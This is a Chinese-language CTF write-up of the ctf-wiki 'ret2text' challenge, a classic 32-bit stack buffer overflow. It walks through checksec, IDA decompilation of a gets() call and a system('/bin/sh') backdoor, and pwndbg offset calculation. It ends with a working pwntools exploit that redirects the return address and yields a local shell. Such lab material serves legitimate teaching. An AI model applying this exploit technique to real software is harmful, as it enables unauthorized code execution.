题目来源
下载位置: https://raw.githubusercontent.com/ctf-wiki/ctf-challenges/master/pwn/stackoverflow/ret2text/bamboofox-ret2text/ret2text
PS:内容来自于CTF-WIKI
分析
文件类型
┌──(kali㉿kali)-[~/Desktop/pwn]
└─$ file ret2text
ret2text: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4f13f004f23ea39d28ca91f2bb83110b4b73713f, with debug_info, not stripped
程序类型位32位ELF文件
防护措施
┌──(kali㉿kali)-[~/Desktop/pwn]
└─$ checksec --file=ret2text
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 83 Symbols No 0 2 ret2text
防护措施好像就有个NX,NX是不允许在堆栈中执行shellcode
IDA分析
main函数内容如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s[100]; // [esp+1Ch] [ebp-64h] BYREF
setvbuf(stdout, 0, 2, 0);
setvbuf(_bss_start, 0, 1, 0);
puts("There is something amazing here, do you know anything?");
gets(s);
printf("Maybe I will tell you next time !");
return 0;
}
可以看到gets
往s里面传值了,但是s的长度是100,这里就是一个简单的栈溢出。之后还找到了一个程序后门,代码内容如下
void secure()
{
unsigned int v0; // eax
int input; // [esp+18h] [ebp-10h] BYREF
int secretcode; // [esp+1Ch] [ebp-Ch]
v0 = time(0);
srand(v0);
secretcode = rand();
__isoc99_scanf((int)&unk_8048760, (int)&input);
if ( input == secretcode )
system("/bin/sh");
}
关于system(/bin/sh)
他就是留下的后门。。这里看一下他的详细信息
.text:0804863A ; 11: system("/bin/sh");
他的地址是0804863A
。
攻击思路
使用栈溢出把程序结束时的返回地址改成后门的执行地址也就是0804863A
,但是栈需要溢出多少位还不知道需要动态分析一下。
PWNDBG分析
┌──(kali㉿kali)-[~/Desktop/pwn]
└─$ gdb ret2text
pwndbg> b main
pwndbg> r
pwndbg> n
pwndbg> n
pwndbg> n
hello
25 in ret2text.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────
*EAX 0xffffcf1c ◂— 'hello'
EBX 0xf7e23e34 (_GLOBAL_OFFSET_TABLE_) ◂— 0x223d2c /* ',="' */
*ECX 0xf7e258ac (_IO_stdfile_0_lock) ◂— 0
EDX 0
EDI 0xf7ffcb80 (_rtld_global_ro) ◂— 0
ESI 0x80486d0 (__libc_csu_init) ◂— push ebp
EBP 0xffffcf88 ◂— 0
ESP 0xffffcf00 —▸ 0xffffcf1c ◂— 'hello'
*EIP 0x80486b3 (main+107) ◂— mov dword ptr [esp], 0x80487a4
─────────────────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]─────────────────────────────────────────────────────────────
......
─────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────
......
───────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────
......
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
这里只写一些重要的操作和一些重要输出,输出中重点内容是
*EAX 0xffffcf1c ◂— 'hello'
EBX 0xf7e23e34 (_GLOBAL_OFFSET_TABLE_) ◂— 0x223d2c /* ',="' */
*ECX 0xf7e258ac (_IO_stdfile_0_lock) ◂— 0
EDX 0
EDI 0xf7ffcb80 (_rtld_global_ro) ◂— 0
ESI 0x80486d0 (__libc_csu_init) ◂— push ebp
EBP 0xffffcf88 ◂— 0
ESP 0xffffcf00 —▸ 0xffffcf1c ◂— 'hello'
*EIP 0x80486b3 (main+107) ◂— mov dword ptr [esp], 0x80487a4
EBP和ESP的地址间隔是0xffffcf88 - 0xffffcf1c
= 4294954888 - 4294954780
= 108(这里可以直接用88h-1ch
初学为了好理解就写全了),拿到间隔长度之后需要+4,因为要往返回地址中写内容,而返回地址的位置是再esp的上面所以需要+4。
============================
返回地址
============================
%esp
============================
xxxxx
============================
PWNTools代码攻击
from pwn import *
io = process("./ret2text")
target = 0x804863a
payload = b"A" * (108 + 4) + p32(target)
io.sendline(payload)
io.interactive()
io.close()
效果展示
┌──(kali㉿kali)-[~/Desktop/pwn]
└─$ python test.py
[+] Starting local process './ret2text': pid 35232
[*] Switching to interactive mode
There is something amazing here, do you know anything?
Maybe I will tell you next time !$ ls
core ret2text run test.py
$ pwd
/home/kali/Desktop/pwn
$ exit
[*] Got EOF while reading in interactive
$
[*] Process './ret2text' stopped with exit code -11 (SIGSEGV) (pid 35232)
[*] Got EOF while sending in interactive